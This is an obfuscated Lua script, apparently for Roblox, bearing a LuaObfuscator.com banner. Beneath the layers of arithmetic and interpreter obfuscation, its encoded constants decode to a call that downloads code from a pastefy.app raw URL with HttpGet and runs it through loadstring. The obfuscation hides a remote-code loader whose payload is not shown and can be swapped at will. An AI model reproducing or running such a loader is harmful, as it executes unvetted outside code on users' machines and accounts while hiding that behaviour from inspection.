--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v105=0;local v106;while true do if (v105==1) then return v106;end if (v105==0) then v106=v5(v84,v19);v19=nil;v105=1;end end else return v84;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v85=0 -0 ;local v86;while true do if (v85==(0 -0)) then v86=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-((1634 -(68 + 997)) -(367 + 201)))) + ((2198 -(226 + 1044)) -(214 + 713)))) ;return v86-(v86%(1 + 0)) ;end end else local v87=(0 -0) + 0 ;local v88;while true do if (v87==0) then v88=(879 -(282 + 595))^(v32-(1638 -((1640 -(32 + 85)) + 114))) ;return (((v31%(v88 + v88))>=v88) and (1 + 0)) or (0 -0) ;end end end end local function v21() local v34=0;local v35;while true do if (v34==1) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + 1 + (0 -0) ;v34=958 -(892 + 65) ;end end end local function v22() local v36=0 -0 ;local v37;local v38;while true do if (v36==1) then return (v38 * (628 -372)) + v37 ;end if (v36==(0 -(0 -0))) then v37,v38=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + (182 -(67 + 113)) ;v36=2 -1 ;end end end local function v23() local v39=0 + 0 + 0 ;local v40;local v41;local v42;local v43;while true do if (v39==(997 -(915 + 82))) then v40,v41,v42,v43=v1(v16,v18,v18 + (8 -5) );v18=v18 + 3 + 1 ;v39=(1 -0) -0 ;end if (v39==(1188 -(1069 + 118))) then return (v43 * (38062656 -21285440)) + (v42 * 65536) + (v41 * (559 -(301 + 2))) + v40 ;end end end local function v24() local v44=v23();local v45=v23();local v46=792 -(368 + 150 + 273) ;local v47=(v20(v45,1,20) * ((6 -4)^(50 -((895 -(261 + 624)) + (13 -5))))) + v44 ;local v48=v20(v45,(284 -204) -59 ,473 -(416 + 26) );local v49=((v20(v45,32)==(3 -2)) and  -(1 + 0)) or (1 -0) ;if (v48==(438 -(145 + 293))) then if (v47==(430 -((903 -(814 + 45)) + 386))) then return v49 * ((3661 -2175) -(998 + 27 + 461)) ;else local v91=(1423 -(630 + 793)) + 0 ;while true do if (v91==(0 + 0)) then v48=773 -(201 + 571) ;v46=0;break;end end end elseif (v48==2047) then return ((v47==((3856 -2718) -(116 + 1022))) and (v49 * (1/0))) or (v49 * NaN) ;end return v8(v49,v48-(4258 -3235) ) * (v46 + (v47/((2 + 0)^(189 -137)))) ;end local function v25(v50) local v51=0 -(0 + 0) ;local v52;local v53;while true do if (v51==(1 + 1 + 0)) then v53={};for v92=3 -2 , #v52 do v53[v92]=v2(v1(v3(v52,v92,v92)));end v51=1750 -(760 + 987) ;end if (v51==0) then v52=nil;if  not v50 then local v98=1913 -(1789 + 124) ;while true do if (v98==(766 -(745 + 21))) then v50=v23();if (v50==0) then return "";end break;end end end v51=1 + 0 ;end if (1==v51) then v52=v3(v16,v18,(v18 + v50) -(2 -1) );v18=v18 + v50 ;v51=2;end if (v51==(11 -8)) then return v6(v53);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return 0;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do local v67=(function() return 0;end)();while true do if (v67~=1) then else if (v54==2) then for v107= #"}",v23() do local v108=(function() return v21();end)();if (v20(v108, #">", #"~")~=0) then else local v111=(function() return 0 + 0 ;end)();local v112=(function() return;end)();local v113=(function() return;end)();local v114=(function() return;end)();local v115=(function() return;end)();while true do if (v111~=1) then else local v116=(function() return 0;end)();while true do if (0==v116) then v114=(function() return nil;end)();v115=(function() return nil;end)();v116=(function() return 1 -0 ;end)();end if (v116==(1 + 0)) then v111=(function() return 2;end)();break;end end end if (v111==2) then while true do if (v112~= #"xxx") then else if (v20(v114, #"nil", #"91(")== #"~") then v115[ #"0836"]=(function() return v60[v115[ #".dev"]];end)();end v55[v107]=(function() return v115;end)();break;end if ( #"~"==v112) then local v157=(function() return 560 -(306 + 254) ;end)();while true do if (v157~=1) then else v112=(function() return 2;end)();break;end if (0~=v157) then else v115=(function() return {v22(),v22(),nil,nil};end)();if (v113==0) then local v180=(function() return 0;end)();local v181=(function() return;end)();while true do if (v180==0) then v181=(function() return 0;end)();while true do if ((0 -0)==v181) then v115[ #"-19"]=(function() return v22();end)();v115[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v113== #" ") then v115[ #"xnx"]=(function() return v23();end)();elseif (v113==(1469 -(899 + 568))) then v115[ #"91("]=(function() return v23() -(2^(11 + 5)) ;end)();elseif (v113~= #"91(") then else local v188=(function() return 0;end)();local v189=(function() return;end)();while true do if (v188==0) then v189=(function() return 0 -0 ;end)();while true do if ((603 -(268 + 335))==v189) then v115[ #"19("]=(function() return v23() -(2^(306 -(60 + 230))) ;end)();v115[ #"http"]=(function() return v22();end)();break;end end break;end end end v157=(function() return 573 -(426 + 146) ;end)();end end end if ((1 + 1)~=v112) then else local v158=(function() return 0;end)();while true do if (v158==(1457 -(282 + 1174))) then v112=(function() return  #"-19";end)();break;end if (v158==0) then if (v20(v114, #"}", #">")== #"\\") then v115[813 -(569 + 242) ]=(function() return v60[v115[5 -3 ]];end)();end if (v20(v114,2,1 + 1 )~= #"\\") then else v115[ #"asd"]=(function() return v60[v115[ #"91("]];end)();end v158=(function() return 1025 -(706 + 318) ;end)();end end end if (v112==(1251 -(721 + 530))) then local v159=(function() return 1271 -(945 + 326) ;end)();local v160=(function() return;end)();while true do if (v159~=(0 -0)) then else v160=(function() return 0;end)();while true do if (0~=v160) then else v113=(function() return v20(v108,2, #"gha");end)();v114=(function() return v20(v108, #"?id=",6);end)();v160=(function() return 1;end)();end if (v160==(1 + 0)) then v112=(function() return  #"<";end)();break;end end break;end end end end break;end if (v111==0) then local v117=(function() return 700 -(271 + 429) ;end)();while true do if (v117==(0 + 0)) then v112=(function() return 0;end)();v113=(function() return nil;end)();v117=(function() return 1;end)();end if (1==v117) then v111=(function() return 1501 -(1408 + 92) ;end)();break;end end end end end end for v109= #".",v23() do v56[v109-#"/" ]=(function() return v28();end)();end return v58;end break;end if (v67==(1086 -(461 + 625))) then if (v54==0) then local v101=(function() return 1288 -(993 + 295) ;end)();local v102=(function() return;end)();while true do if (v101~=(0 + 0)) then else v102=(function() return 0;end)();while true do if (v102==(1171 -(418 + 753))) then v55=(function() return {};end)();v56=(function() return {};end)();v102=(function() return 1 + 0 ;end)();end if (v102==(1 + 0)) then v57=(function() return {};end)();v58=(function() return {v55,v56,nil,v57};end)();v102=(function() return 1 + 1 ;end)();end if ((531 -(406 + 123))~=v102) then else v54=(function() return  #"]";end)();break;end end break;end end end if (v54== #"[") then local v103=(function() return 0;end)();local v104=(function() return;end)();while true do if (v103==0) then v104=(function() return 0;end)();while true do if (v104~=(1770 -(1749 + 20))) then else for v119= #"{",v59 do local v120=(function() return 0 + 0 ;end)();local v121=(function() return;end)();local v122=(function() return;end)();local v123=(function() return;end)();while true do if ((1323 -(1249 + 73))~=v120) then else v123=(function() return nil;end)();while true do if (v121~=(0 + 0)) then else local v178=(function() return 0;end)();while true do if (v178~=0) then else v122=(function() return v21();end)();v123=(function() return nil;end)();v178=(function() return 1146 -(466 + 679) ;end)();end if (1==v178) then v121=(function() return 2 -1 ;end)();break;end end end if ((2 -1)==v121) then if (v122== #"{") then v123=(function() return v21()~=(1900 -(106 + 1794)) ;end)();elseif (v122==2) then v123=(function() return v24();end)();elseif (v122~= #"xxx") then else v123=(function() return v25();end)();end v60[v119]=(function() return v123;end)();break;end end break;end if (v120==(0 + 0)) then v121=(function() return 0 + 0 ;end)();v122=(function() return nil;end)();v120=(function() return 2 -1 ;end)();end end end v58[ #"nil"]=(function() return v21();end)();v104=(function() return 2;end)();end if (v104==0) then v59=(function() return v23();end)();v60=(function() return {};end)();v104=(function() return 2 -1 ;end)();end if (v104==(116 -(4 + 110))) then v54=(function() return 2;end)();break;end end break;end end end v67=(function() return 1;end)();end end end end local function v29(v61,v62,v63) local v64=v61[585 -(57 + 527) ];local v65=v61[2];local v66=v61[3];return function(...) local v68=v64;local v69=v65;local v70=v66;local v71=v27;local v72=1428 -(41 + 1386) ;local v73= -((153 -49) -(17 + 86));local v74={};local v75={...};local v76=v12("#",...) -(1 -0) ;local v77={};local v78={};for v89=0 -0 ,v76 do if ((v89>=v70) or (1155>2350)) then v74[v89-v70 ]=v75[v89 + 1 ];else v78[v89]=v75[v89 + (167 -(122 + 44)) ];end end local v79=(v76-v70) + (1 -0) ;local v80;local v81;while true do local v90=0 -0 ;while true do if ((4029<=4853) and (v90==((336 -(144 + 192)) + (216 -(42 + 174))))) then v80=v68[v72];v81=v80[1];v90=1 + 0 ;end if (v90==(1 -0)) then if (v81<=(6 + 1)) then if ((v81<=(68 -(30 + 35))) or (516>3434)) then if (v81<=(1 + 0 + 0)) then if (v81==(1257 -(1043 + 91 + 123))) then local v124=0 -0 ;local v125;local v126;while true do if (v124==1) then v78[v125 + ((2717 -(363 + 1141)) -(323 + 889)) ]=v126;v78[v125]=v126[v80[10 -6 ]];break;end if ((4046>=3033) and (v124==(580 -(361 + 219)))) then v125=v80[322 -(53 + 267) ];v126=v78[v80[1 + 2 ]];v124=414 -(15 + 398) ;end end else v78[v80[984 -(18 + 964) ]]={};end elseif (v81==(7 -5)) then v78[v80[2 + 0 ]]=v63[v80[2 + 1 ]];else v78[v80[852 -(20 + (2410 -(1183 + 397))) ]]={};end elseif (v81<=(4 + 1)) then if ((v81==(130 -(116 + 10))) or (2719<=1447)) then v78[v80[(2 -1) + 1 + 0 ]]();else local v131=v80[(554 + 186) -(542 + 196) ];v78[v131]=v78[v131](v13(v78,v131 + (1 -0) ,v73));end elseif (v81==(2 + 4)) then do return;end else do return;end end elseif (v81<=(6 + 5)) then if (v81<=(4 + 5)) then if (v81>(20 -12)) then local v133=0 -(1975 -(1913 + 62)) ;local v134;local v135;local v136;local v137;while true do if (v133==(1553 -(1126 + 425))) then for v175=v134,v73 do v137=v137 + ((256 + 150) -(118 + (759 -472))) ;v78[v175]=v135[v137];end break;end if (v133==(3 -2)) then v73=(v136 + v134) -(1122 -(118 + 1003)) ;v137=(1933 -(565 + 1368)) -0 ;v133=379 -(142 + 235) ;end if ((v133==0) or (4134<3926)) then v134=v80[9 -7 ];v135,v136=v71(v78[v134](v13(v78,v134 + 1 + (0 -0) ,v80[3])));v133=1;end end else v78[v80[(2640 -(1477 + 184)) -(553 + 424) ]]=v80[5 -2 ];end elseif (v81==(9 + 1)) then local v140=0 + 0 ;local v141;while true do if ((v140==0) or (164>=2785)) then v141=v80[2 + 0 ];v78[v141]=v78[v141](v13(v78,v141 + 1 + (0 -0) ,v73));break;end end else v78[v80[2 + 0 + 0 ]]();end elseif (v81<=13) then if (v81>(25 -13)) then v78[v80[5 -3 ]]=v80[3];else local v144=v80[4 -2 ];local v145,v146=v71(v78[v144](v13(v78,v144 + 1 + 0 ,v80[14 -11 ])));v73=(v146 + v144) -(754 -(239 + 514)) ;local v147=0 + 0 ;for v153=v144,v73 do v147=v147 + (1330 -(797 + 532)) ;v78[v153]=v145[v147];end end elseif (v81>(11 + 3)) then v78[v80[1 + 1 ]]=v63[v80[6 -(859 -(564 + 292)) ]];else local v150=0;local v151;local v152;while true do if (v150==(1203 -((642 -269) + 829))) then v78[v151 + (732 -((1434 -958) + 255)) ]=v152;v78[v151]=v152[v80[1134 -(369 + 761) ]];break;end if (v150==(0 + (304 -(244 + 60)))) then v151=v80[2 -0 ];v152=v78[v80[5 -2 ]];v150=239 -(64 + 174) ;end end end v72=v72 + 1 + 0 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F51426F69595A4A762F72617700094Q00037Q001202000100013Q001202000200023Q00200E000200020003001208000400044Q000C000200044Q000500013Q00022Q00040001000100012Q00073Q00017Q00",v9(),...);